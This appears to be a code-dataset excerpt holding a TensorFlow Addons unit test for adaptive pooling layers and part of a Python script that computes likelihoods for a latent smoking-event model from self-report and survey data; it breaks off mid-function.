| 26.934959 | 239 | 0.796861 | 1,650 | 9,939 | 4.461212 | 0.109697 | 0.095367 | 0.060046 | 0.071322 | 0.808586 | 0.781144 | 0.768238 | 0.728705 | 0.68401 | 0.644614 | 0 | 0.025321 | 0.105946 | 9,939 | 368 | 240 | 27.008152 | 0.803061 | 0.100513 | 0 | 0.751037 | 0 | 0.074689 | 0.714302 | 0.228244 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.016598 | 0 | 0.016598 | 0.012448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ef8a1ea2e38b60480fafd429e2d0d8a2b8681dba | 7,136 | py | Python | tensorflow_addons/layers/tests/adaptive_pooling_test.py | Susmit-A/addons | 01d0dd9355cb8fc3962991ac6f49d851bd64e8d1 | [
"Apache-2.0"
] | null | null | null | tensorflow_addons/layers/tests/adaptive_pooling_test.py | Susmit-A/addons | 01d0dd9355cb8fc3962991ac6f49d851bd64e8d1 | [
"Apache-2.0"
] | null | null | null | tensorflow_addons/layers/tests/adaptive_pooling_test.py | Susmit-A/addons | 01d0dd9355cb8fc3962991ac6f49d851bd64e8d1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for AdaptivePooling layers."""
import pytest
import numpy as np
from tensorflow_addons.layers import adaptive_pooling
from tensorflow_addons.utils import test_utils
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_avg_1d():
valid_input = np.arange(start=0.0, stop=12.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 12, 1))
output = np.array([1.0, 4.0, 7.0, 10.0]).astype(np.float32)
output = np.reshape(output, (1, 4, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling1D,
kwargs={"output_size": 4, "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=12.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 12))
output = np.array([1.0, 4.0, 7.0, 10.0]).astype(np.float32)
output = np.reshape(output, (1, 1, 4))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling1D,
kwargs={"output_size": 4, "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_avg_2d():
valid_input = np.arange(start=0.0, stop=40.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 4, 10, 1))
output = np.array([[7.0, 12.0], [27.0, 32.0]]).astype(np.float32)
output = np.reshape(output, (1, 2, 2, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling2D,
kwargs={"output_size": (2, 2), "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=40.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 4, 10))
output = np.array([[7.0, 12.0], [27.0, 32.0]]).astype(np.float32)
output = np.reshape(output, (1, 1, 2, 2))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling2D,
kwargs={"output_size": (2, 2), "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_avg_3d():
valid_input = np.arange(start=0.0, stop=80.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 4, 10, 2, 1))
output = np.array(
[[[14.0, 15.0], [24.0, 25.0]], [[54.0, 55.0], [64.0, 65.0]]]
).astype(np.float32)
output = np.reshape(output, (1, 2, 2, 2, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling3D,
kwargs={"output_size": (2, 2, 2), "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=80.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 4, 10, 2))
output = np.array(
[[[14.0, 15.0], [24.0, 25.0]], [[54.0, 55.0], [64.0, 65.0]]]
).astype(np.float32)
output = np.reshape(output, (1, 1, 2, 2, 2))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling3D,
kwargs={"output_size": (2, 2, 2), "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_max_1d():
valid_input = np.arange(start=0.0, stop=12.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 12, 1))
output = np.array([2.0, 5.0, 8.0, 11.0]).astype(np.float32)
output = np.reshape(output, (1, 4, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling1D,
kwargs={"output_size": 4, "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=12.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 12))
output = np.array([2.0, 5.0, 8.0, 11.0]).astype(np.float32)
output = np.reshape(output, (1, 1, 4))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling1D,
kwargs={"output_size": 4, "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_max_2d():
valid_input = np.arange(start=0.0, stop=40.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 4, 10, 1))
output = np.array([[14.0, 19.0], [34.0, 39.0]]).astype(np.float32)
output = np.reshape(output, (1, 2, 2, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling2D,
kwargs={"output_size": (2, 2), "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=40.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 4, 10))
output = np.array([[14.0, 19.0], [34.0, 39.0]]).astype(np.float32)
output = np.reshape(output, (1, 1, 2, 2))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling2D,
kwargs={"output_size": (2, 2), "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_max_3d():
valid_input = np.arange(start=0.0, stop=80.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 4, 10, 2, 1))
output = np.array(
[[[28.0, 29.0], [38.0, 39.0]], [[68.0, 69.0], [78.0, 79.0]]]
).astype(np.float32)
output = np.reshape(output, (1, 2, 2, 2, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling3D,
kwargs={"output_size": (2, 2, 2), "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=80.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 4, 10, 2))
output = np.array(
[[[28.0, 29.0], [38.0, 39.0]], [[68.0, 69.0], [78.0, 79.0]]]
).astype(np.float32)
output = np.reshape(output, (1, 1, 2, 2, 2))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling3D,
kwargs={"output_size": (2, 2, 2), "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
| 39.865922 | 80 | 0.644759 | 1,068 | 7,136 | 4.141386 | 0.13764 | 0.108524 | 0.065114 | 0.086819 | 0.862311 | 0.862311 | 0.862311 | 0.862311 | 0.862311 | 0.862311 | 0 | 0.080523 | 0.185538 | 7,136 | 178 | 81 | 40.089888 | 0.680489 | 0.097394 | 0 | 0.847222 | 0 | 0 | 0.09156 | 0.025226 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.027778 | 0 | 0.069444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ef8ac364f3fa8985797b1fa8a6618609c448eb1b | 112,252 | py | Python | methods/tie_together/smart-proposal.py | wdempsey/sense2stop-lvm | ea44d5f9199382d30e4c5a5ff4bd524313ceb5b2 | [
"CECILL-B"
] | 1 | 2020-04-18T11:16:02.000Z | 2020-04-18T11:16:02.000Z | methods/tie_together/smart-proposal.py | wdempsey/sense2stop-lvm | ea44d5f9199382d30e4c5a5ff4bd524313ceb5b2 | [
"CECILL-B"
] | 6 | 2020-04-13T18:38:04.000Z | 2022-03-12T00:55:56.000Z | methods/tie_together/smart-proposal.py | wdempsey/sense2stop-lvm | ea44d5f9199382d30e4c5a5ff4bd524313ceb5b2 | [
"CECILL-B"
] | 1 | 2020-07-02T04:47:00.000Z | 2020-07-02T04:47:00.000Z | # %%
from multiprocessing import Pool
import time
import numpy as np
from scipy.stats import mvn
import os
import pickle
import copy
import matplotlib.pyplot as plt
from scipy import interpolate
from scipy.stats import norm
# %%
# Helper functions
def grow_tree(depth):
if depth==1:
current_data = list([0,1])
return current_data
elif depth > 1:
curr_level = 1
current_data = list([0,1])
curr_level = 2
while curr_level <= depth:
# Sweep through all leaves at the current level
list_curr_level = list(np.repeat(np.nan, repeats=2**curr_level))
for i in range(0, len(current_data)):
left_leaf = np.append(np.array(current_data[i]), 0)
right_leaf = np.append(np.array(current_data[i]), 1)
list_curr_level[2*i] = list(left_leaf)
list_curr_level[2*i + 1] = list(right_leaf)
# Go one level below
current_data = list_curr_level
curr_level += 1
return current_data
else:
return 0
# %%
class Latent:
'''
A collection of objects and methods related to latent process subcomponent
'''
def __init__(self, participant = None, day = None, latent_data = None, params = None, index = None):
self.participant = participant
self.day = day
self.latent_data = copy.deepcopy(latent_data)
self.params = copy.deepcopy(params)
self.index = index
def update_params(self, new_params):
'''
Update parameters
'''
self.params = copy.deepcopy(new_params)
def calc_loglik(self):
'''
Calculate loglikelihood for latent process subcomponent
'''
smoking_times = self.latent_data['hours_since_start_day']
day_length = self.latent_data['day_length']
lambda_prequit = self.params['lambda_prequit']
lambda_postquit = self.params['lambda_postquit']
# Calculate the total number of latent smoking times in the current iteration
m = len(smoking_times)
# lambda_prequit: number of events per hour during prequit period
# lambda_postquit: number of events per hour during postquit period
# day_length: total number of hours between wakeup time to sleep time on a given participant day
if self.day <4:
lik = np.exp(-lambda_prequit*day_length) * ((lambda_prequit*day_length) ** m) / np.math.factorial(m)
loglik = np.log(lik)
else:
lik = np.exp(-lambda_postquit*day_length) * ((lambda_postquit*day_length) ** m) / np.math.factorial(m)
loglik = np.log(lik)
return loglik
# %%
class EODSurvey:
'''
A collection of objects and methods related to end-of-day survey subcomponent
'''
def __init__(self, participant = None, day = None, latent_data = None, observed_data = None, params = None, index = None):
self.participant = participant
self.day = day
self.latent_data = copy.deepcopy(latent_data)
self.observed_data = copy.deepcopy(observed_data)
self.params = copy.deepcopy(params)
self.index = index
def update_params(self, new_params):
'''
Update parameters
'''
self.params = copy.deepcopy(new_params)
def calc_loglik(self):
'''
Calculate loglikelihood corresponding to end-of-day EMA subcomponent
'''
# Inputs to be checked ----------------------------------------------------------------------------
any_eod_ema = len(self.observed_data['assessment_begin'])
if any_eod_ema > 0:
# Begin after checks on inputs have been passed ---------------------------------------------------
# Go through each box one by one
collect_box_probs = np.array([])
arr_ticked = self.observed_data['ticked_box_raw'] # which boxes were ticked?
m = len(self.latent_data['hours_since_start_day']) # are there any latent smoking events?
all_boxes = np.array([8,9,10,11,12,13,14,15,16,17,18,19,20])
if (m == 0) and (len(arr_ticked) == 0):
collect_box_probs = np.repeat(1, len(all_boxes))
elif (m == 0) and (len(arr_ticked) > 0):
collect_box_probs = np.repeat(0, len(all_boxes))
else:
start_day = 0
end_day = 24
# Rescale time to be within 24 hour clock
all_true_smoke_times = self.latent_data['hours_since_start_day'] + self.observed_data['start_time_hour_of_day']
for k in range(0, len(all_boxes)):
curr_box = all_boxes[k] # lower limit of Box k; setting curr_lk and curr_box to be separate variables in case change of scale is needed for curr_lk
curr_lk = all_boxes[k] # lower limit of Box k
curr_uk = curr_lk + 1 # upper limit of Box k; add one hour to lower limit
recall_epsilon = self.params['recall_epsilon'] # in hours
num_points_to_sample = self.params['budget']
if len(all_true_smoke_times) <= num_points_to_sample:
true_smoke_times = all_true_smoke_times
else:
true_smoke_times = all_true_smoke_times[(all_true_smoke_times > curr_lk - recall_epsilon) * (all_true_smoke_times < curr_uk + recall_epsilon)]
if len(true_smoke_times) > num_points_to_sample:
true_smoke_times = np.random.choice(a = true_smoke_times, size = num_points_to_sample, replace = False)
# At this point, the length of true_smoke_times will always be at most num_points_to_sample
if len(true_smoke_times) > 0:
# Specify covariance matrix based on an exchangeable correlation matrix
rho = self.params['rho']
use_cormat = np.eye(len(true_smoke_times)) + rho*(np.ones((len(true_smoke_times),1)) * np.ones((1,len(true_smoke_times))) - np.eye(len(true_smoke_times)))
use_sd = self.params['sd']
use_covmat = (use_sd**2) * use_cormat
# Calculate total possible probability
total_possible_prob, error_code_total_possible_prob = mvn.mvnun(lower = np.repeat(start_day, len(true_smoke_times)),
upper = np.repeat(end_day, len(true_smoke_times)),
means = true_smoke_times,
covar = use_covmat)
# Begin calculating edge probabilities
collect_edge_probabilities = np.array([])
limits_of_integration = grow_tree(depth=len(true_smoke_times))
for j in range(0, len(limits_of_integration)):
curr_limits = np.array(limits_of_integration[j])
curr_lower_limits = np.where(curr_limits==0, start_day, curr_uk)
curr_upper_limits = np.where(curr_limits==0, curr_lk, end_day)
edge_probabilities, error_code_edge_probabilities = mvn.mvnun(lower = curr_lower_limits,
upper = curr_upper_limits,
means = true_smoke_times,
covar = use_covmat)
collect_edge_probabilities = np.append(collect_edge_probabilities, edge_probabilities)
total_edge_probabilities = np.sum(collect_edge_probabilities)
prob_none_recalled_within_current_box = total_edge_probabilities/total_possible_prob
# prob_none_recalled_within_current_box may be slightly above 1, e.g., 1.000000XXXXX
if (prob_none_recalled_within_current_box-1) > 0:
prob_none_recalled_within_current_box = 1
prob_at_least_one_recalled_within_box = 1-prob_none_recalled_within_current_box
else:
prob_none_recalled_within_current_box = 1
prob_at_least_one_recalled_within_box = 1-prob_none_recalled_within_current_box
# Exit the first IF-ELSE statement
if curr_box in arr_ticked:
collect_box_probs = np.append(collect_box_probs, prob_at_least_one_recalled_within_box)
else:
collect_box_probs = np.append(collect_box_probs, prob_none_recalled_within_current_box)
# Exit if-else statement
prob_observed_box_checking_pattern = np.prod(collect_box_probs)
loglik = np.log(prob_observed_box_checking_pattern)
self.observed_data['prob_bk'] = collect_box_probs
self.observed_data['product_prob_bk'] = prob_observed_box_checking_pattern
self.observed_data['log_product_prob_bk'] = loglik
else:
# If participant did not complete EOD survey, then this measurement type should NOT contribute to the loglikelihood
loglik = 0
return loglik
# %%
class SelfReport:
def __init__(self, participant = None, day = None, latent_data = None, observed_data = None, params = None, index = None):
self.participant = participant
self.day = day
self.latent_data = copy.deepcopy(latent_data)
self.observed_data = copy.deepcopy(observed_data)
self.params = copy.deepcopy(params)
self.index = index
def update_params(self, new_params):
'''
Update parameters
'''
self.params = copy.deepcopy(new_params)
def match(self):
'''
Matches each EMA with one latent smoking time occurring before the Self Report EMA
After a latent smoking time is matched, it is removed
'''
# Inputs to be checked --------------------------------------------
all_latent_times = self.latent_data['hours_since_start_day']
tot_ema = len(self.observed_data['assessment_type'])
if tot_ema > 0:
self.observed_data['matched_latent_time'] = np.repeat(np.nan, tot_ema)
remaining_latent_times = copy.deepcopy(all_latent_times)
remaining_latent_times = np.sort(remaining_latent_times)
for i in range(0, tot_ema):
current_lb = self.observed_data['assessment_begin_shifted'][i]
current_ub = self.observed_data['assessment_begin'][i]
#current_assessment_type = self.observed_data['assessment_type'][i]
which_within = (remaining_latent_times >= 0) & (remaining_latent_times < current_ub)
if np.sum(which_within)>0:
which_idx = np.where(which_within)
matched_idx = np.max(which_idx)
matched_latent_time = remaining_latent_times[matched_idx]
self.observed_data['matched_latent_time'][i] = matched_latent_time
remaining_latent_times = np.delete(remaining_latent_times, matched_idx)
remaining_latent_times = np.sort(remaining_latent_times)
else:
# This case can occur when between time 0 and time t there is no
# latent smoking time, but a self-report occurred between time 0 and time t
# This case may happen after a dumb death move
self.observed_data['matched_latent_time'][i] = np.nan
else:
self.observed_data['matched_latent_time'] = np.array([])
def calc_loglik(self):
'''
Call the method calc_loglik after the method match has been called
Calculate loglikelihood corresponding to self report EMA subcomponent
'''
# Inputs to be checked --------------------------------------------
all_latent_times = np.sort(self.latent_data['hours_since_start_day'])
tot_latent_events = len(all_latent_times)
if len(self.observed_data['assessment_type']) == 0:
tot_sr = 0
else:
# Total number of Self-Report
tot_sr = np.sum(self.observed_data['assessment_type']=='selfreport')
# Specify parameter values ----------------------------------------
lambda_delay = self.params['lambda_delay']
use_scale = self.params['sd']
prob_reporting_when_any = self.params['prob_reporting_when_any']
prob_reporting_when_none = self.params['prob_reporting_when_none']
if tot_latent_events == 0 and tot_sr > 0 :
# Note: in this case, any Self-Report EMA cannot be matched to a latent smoking time
# This case could happen if, for example, previous move might have been a 'death'
# but participant initiated at least one self-report.
# Assume that participant can lie/misremember when they Self-Report
total_lik = prob_reporting_when_none**tot_sr
total_loglik = np.log(total_lik)
elif tot_latent_events > 0 and tot_sr == 0:
# Note: in this case, latent smoking times exist but they were not reported in a Self Report EMA
# This case could happen if, for example, previous move might have been a 'birth'
# but there was no self-report observed.
# Assume that participant does not lie when they Self-Report
# However, participant may neglect to Self-Report a smoking incident
# for example, due to burden
total_lik = (1 - prob_reporting_when_any)**tot_latent_events
total_loglik = np.log(total_lik)
elif tot_latent_events > 0 and tot_sr > 0:
total_loglik = 0
# Subcomponent due to delay ---------------------------------------
self.observed_data['delay'] = self.observed_data['assessment_begin'] - self.observed_data['matched_latent_time']
total_loglik += tot_sr * np.log(lambda_delay) - lambda_delay * np.nansum(self.observed_data['delay'])
# Subcomponent due to recall --------------------------------------
tot_ema = len(self.observed_data['assessment_order'])
self.observed_data['prob_bk'] = np.repeat(np.nan, tot_ema)
self.observed_data['log_prob_bk'] = np.repeat(np.nan, tot_ema)
tot_sr_with_matched = 0
for i in range(0, tot_ema):
if self.observed_data['assessment_type'][i]=='selfreport':
current_lb = self.observed_data['assessment_begin_shifted'][i]
current_ub = self.observed_data['assessment_begin'][i]
curr_matched_time = self.observed_data['matched_latent_time'][i]
# Check: Is current Self-Report EMA matched to any latent smoking time?
if np.isnan(curr_matched_time):
# Current Self-Report EMA is NOT matched to any latent smoking time
self.observed_data['prob_bk'][i] = prob_reporting_when_none
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
else:
# Current Self-Report EMA is matched to a latent smoking time
tot_sr_with_matched += 1 # update counter
# Calculate numerator of bk
windowtag = self.observed_data['windowtag'][i]
# Note: each value of windowtag corresponds to a response option in hours
# use_this_window_max will be based on time when prevous EMA was delivered
use_this_window_min = {1: 0/60, 2: 5/60, 3: 15/60, 4: 30/60}
use_this_window_max = {1: 5/60, 2: 15/60, 3: 30/60, 4: np.nan}
# upper limit of integration
current_uk = self.observed_data['assessment_begin'][i] - use_this_window_min[windowtag]
if windowtag == 4:
if self.observed_data['assessment_begin_shifted'][i] > current_uk:
current_lk = self.observed_data['assessment_begin_shifted'][i] - 24 # subtract 24 hours
else:
current_lk = self.observed_data['assessment_begin_shifted'][i]
else:
current_lk = self.observed_data['assessment_begin'][i] - use_this_window_max[windowtag]
# Calculate denominator of bk
if current_lk <= current_lb:
total_prob_constrained_lb = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale)
else:
total_prob_constrained_lb = norm.cdf(x = current_lb, loc = curr_matched_time, scale = use_scale)
total_prob_constrained_ub = norm.cdf(x = current_ub, loc = curr_matched_time, scale = use_scale)
tot_prob_constrained = total_prob_constrained_ub - total_prob_constrained_lb
prob_constrained_lk = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale)
prob_constrained_uk = norm.cdf(x = current_uk, loc = curr_matched_time, scale = use_scale)
if (prob_constrained_uk - prob_constrained_lk) == tot_prob_constrained:
self.observed_data['prob_bk'][i] = (current_uk - current_lk)/(current_ub - current_lb)
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
else:
self.observed_data['prob_bk'][i] = (prob_constrained_uk - prob_constrained_lk)/tot_prob_constrained
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
# We have already exited the for loop
total_loglik += np.nansum(self.observed_data['log_prob_bk'])
# Subcomponent due to propensity to self-report
total_loglik += tot_sr_with_matched * np.log(prob_reporting_when_any) + (tot_latent_events - tot_sr_with_matched) * np.log(1-prob_reporting_when_any)
else: #tot_latent_events == 0 and tot_sr == 0:
total_lik = 1
total_loglik = np.log(total_lik)
return total_loglik
# %%
class RandomEMA:
def __init__(self, participant = None, day = None, latent_data = None, observed_data = None, params = None, index = None):
self.participant = participant
self.day = day
self.latent_data = copy.deepcopy(latent_data)
self.observed_data = copy.deepcopy(observed_data)
self.params = copy.deepcopy(params)
self.index = index
def update_params(self, new_params):
'''
Update parameters
'''
self.params = copy.deepcopy(new_params)
def match(self):
'''
Matches each EMA with one latent smoking time occurring before the Random EMA
After a latent smoking time is matched, it is removed
'''
# Inputs to be checked --------------------------------------------
all_latent_times = self.latent_data['hours_since_start_day']
tot_ema = len(self.observed_data['assessment_type'])
if tot_ema > 0:
self.observed_data['matched_latent_time'] = np.repeat(np.nan, tot_ema)
remaining_latent_times = copy.deepcopy(all_latent_times)
remaining_latent_times = np.sort(remaining_latent_times)
for i in range(0, tot_ema):
current_lb = self.observed_data['assessment_begin_shifted'][i]
current_ub = self.observed_data['assessment_begin'][i]
#current_assessment_type = self.observed_data['assessment_type'][i]
which_within = (remaining_latent_times >= 0) & (remaining_latent_times < current_ub)
if np.sum(which_within)>0:
which_idx = np.where(which_within)
matched_idx = np.max(which_idx)
matched_latent_time = remaining_latent_times[matched_idx]
self.observed_data['matched_latent_time'][i] = matched_latent_time
remaining_latent_times = np.delete(remaining_latent_times, matched_idx)
remaining_latent_times = np.sort(remaining_latent_times)
else:
# This case can occur when between time 0 and time t there is no
# latent smoking time, but a self-report occurred between time 0 and time t
# This case may happen after a dumb death move
self.observed_data['matched_latent_time'][i] = np.nan
else:
self.observed_data['matched_latent_time'] = np.array([])
def calc_loglik(self):
'''
Call the method calc_loglik after the method match has been called
Calculate loglikelihood corresponding to Random EMA subcomponent
'''
use_scale = self.params['sd']
prob_reporting_when_any = self.params['prob_reporting_when_any']
prob_reporting_when_none = self.params['prob_reporting_when_none']
all_latent_times = np.sort(self.latent_data['hours_since_start_day'])
tot_latent_events = len(all_latent_times)
tot_ema = len(self.observed_data['assessment_type'])
if tot_ema == 0:
tot_random_ema = 0
else:
tot_random_ema = np.sum(self.observed_data['assessment_type']=='random_ema')
self.observed_data['prob_bk'] = np.repeat(np.nan, tot_ema)
self.observed_data['log_prob_bk'] = np.repeat(np.nan, tot_ema)
if tot_random_ema > 0:
total_loglik = 0
# Note: each value of windowtag corresponds to a response option in hours
# use_this_window_max will be based on time when prevous EMA was delivered
use_this_window_min = {1: 0/60, 2: 20/60, 3: 40/60, 4: 60/60, 5: 80/60, 6: 100/60}
use_this_window_max = {1: 20/60, 2: 40/60, 3: 60/60, 4: 80/60, 5: 100/60, 6: np.nan}
for i in range(0, tot_ema):
if (self.observed_data['assessment_type'][i]=='random_ema') and (self.observed_data['smoke'][i]=='Yes'):
curr_matched_time = self.observed_data['matched_latent_time'][i]
if np.isnan(curr_matched_time):
self.observed_data['prob_bk'][i] = prob_reporting_when_none # i.e., prob of reporting when no latent smoking time can be matched
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
else:
current_lb = self.observed_data['assessment_begin_shifted'][i]
current_ub = self.observed_data['assessment_begin'][i]
windowtag = self.observed_data['windowtag'][i]
# upper limit of integration
current_uk = self.observed_data['assessment_begin'][i] - use_this_window_min[windowtag]
# lower limit of integration
if windowtag == 6:
if self.observed_data['assessment_begin_shifted'][i] > current_uk:
current_lk = self.observed_data['assessment_begin_shifted'][i] - 24 # subtract 24 hours
else:
current_lk = self.observed_data['assessment_begin_shifted'][i]
else:
current_lk = self.observed_data['assessment_begin'][i] - use_this_window_max[windowtag]
if (current_lk <= current_lb and current_uk <= current_lb):
# i.e., the upper bound and lower bound of the recalled smoking time both come before current_lb
# adding a point to this region should be a very unlikely occurrence
total_prob_constrained_lb = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale) # note that x = current_lk
total_prob_constrained_ub = norm.cdf(x = current_ub, loc = curr_matched_time, scale = use_scale)
tot_prob_constrained = total_prob_constrained_ub - total_prob_constrained_lb
prob_constrained_lk = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale)
prob_constrained_uk = norm.cdf(x = current_uk, loc = curr_matched_time, scale = use_scale)
if (prob_constrained_uk - prob_constrained_lk) == tot_prob_constrained:
self.observed_data['prob_bk'][i] = (current_uk - current_lk)/(current_ub - current_lb)
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
else:
self.observed_data['prob_bk'][i] = (prob_constrained_uk - prob_constrained_lk)/tot_prob_constrained
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
elif (current_lk <= current_lb and current_uk > current_lb):
# i.e., the lower bound of the recalled smoking time come before current_lb
# but the upper bound comes after current_lb
total_prob_constrained_lb = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale) # note that x = current_lk
total_prob_constrained_ub = norm.cdf(x = current_ub, loc = curr_matched_time, scale = use_scale)
tot_prob_constrained = total_prob_constrained_ub - total_prob_constrained_lb
prob_constrained_lk = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale)
prob_constrained_uk = norm.cdf(x = current_uk, loc = curr_matched_time, scale = use_scale)
if (prob_constrained_uk - prob_constrained_lk) == tot_prob_constrained:
self.observed_data['prob_bk'][i] = (current_uk - current_lk)/(current_ub - current_lb)
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
else:
self.observed_data['prob_bk'][i] = (prob_constrained_uk - prob_constrained_lk)/tot_prob_constrained
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
elif (current_lk >= current_lb and current_uk >= current_lb):
total_prob_constrained_lb = norm.cdf(x = current_lb, loc = curr_matched_time, scale = use_scale)
total_prob_constrained_ub = norm.cdf(x = current_ub, loc = curr_matched_time, scale = use_scale)
tot_prob_constrained = total_prob_constrained_ub - total_prob_constrained_lb
prob_constrained_lk = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale)
prob_constrained_uk = norm.cdf(x = current_uk, loc = curr_matched_time, scale = use_scale)
if (prob_constrained_uk - prob_constrained_lk) == tot_prob_constrained:
self.observed_data['prob_bk'][i] = (current_uk - current_lk)/(current_ub - current_lb)
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
else:
self.observed_data['prob_bk'][i] = (prob_constrained_uk - prob_constrained_lk)/tot_prob_constrained
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
else:
total_loglik += np.nan # this case should not occur; sanity check on whether any cases were not accounted for
elif (self.observed_data['assessment_type'][i]=='random_ema') and (self.observed_data['smoke'][i]=='No'):
curr_matched_time = self.observed_data['matched_latent_time'][i]
current_lb = self.observed_data['assessment_begin_shifted'][i]
current_ub = self.observed_data['assessment_begin'][i]
if np.isnan(curr_matched_time):
self.observed_data['prob_bk'][i] = 1-prob_reporting_when_none # i.e., prob of NOT reporting when no latent smoking time can be matched
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
else:
self.observed_data['prob_bk'][i] = 1-prob_reporting_when_any # i.e., prob of NOT reporting when a latent smoking time can be matched
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
else:
# this is a case when we have a self-report EMA; do not adjust total_loglik
pass
else:
# This is the case when total number of Random EMA=0
# Random EMA will not make a contribution to the overall loglikelihood
total_loglik = 0
return total_loglik
# %%
def get_for_all_current_state_lik(all_participant_ids,
all_days,
curr_dict_latent_data,
curr_dict_observed_ema,
curr_dict_observed_eod_survey,
curr_latent_params,
curr_selfreport_params,
curr_randomema_params,
curr_eodsurvey_params):
# Calculate likelihood for current configuration of points (prior to any proposal)
dict_current_state = {}
for this_participant in all_participant_ids:
current_dict = {}
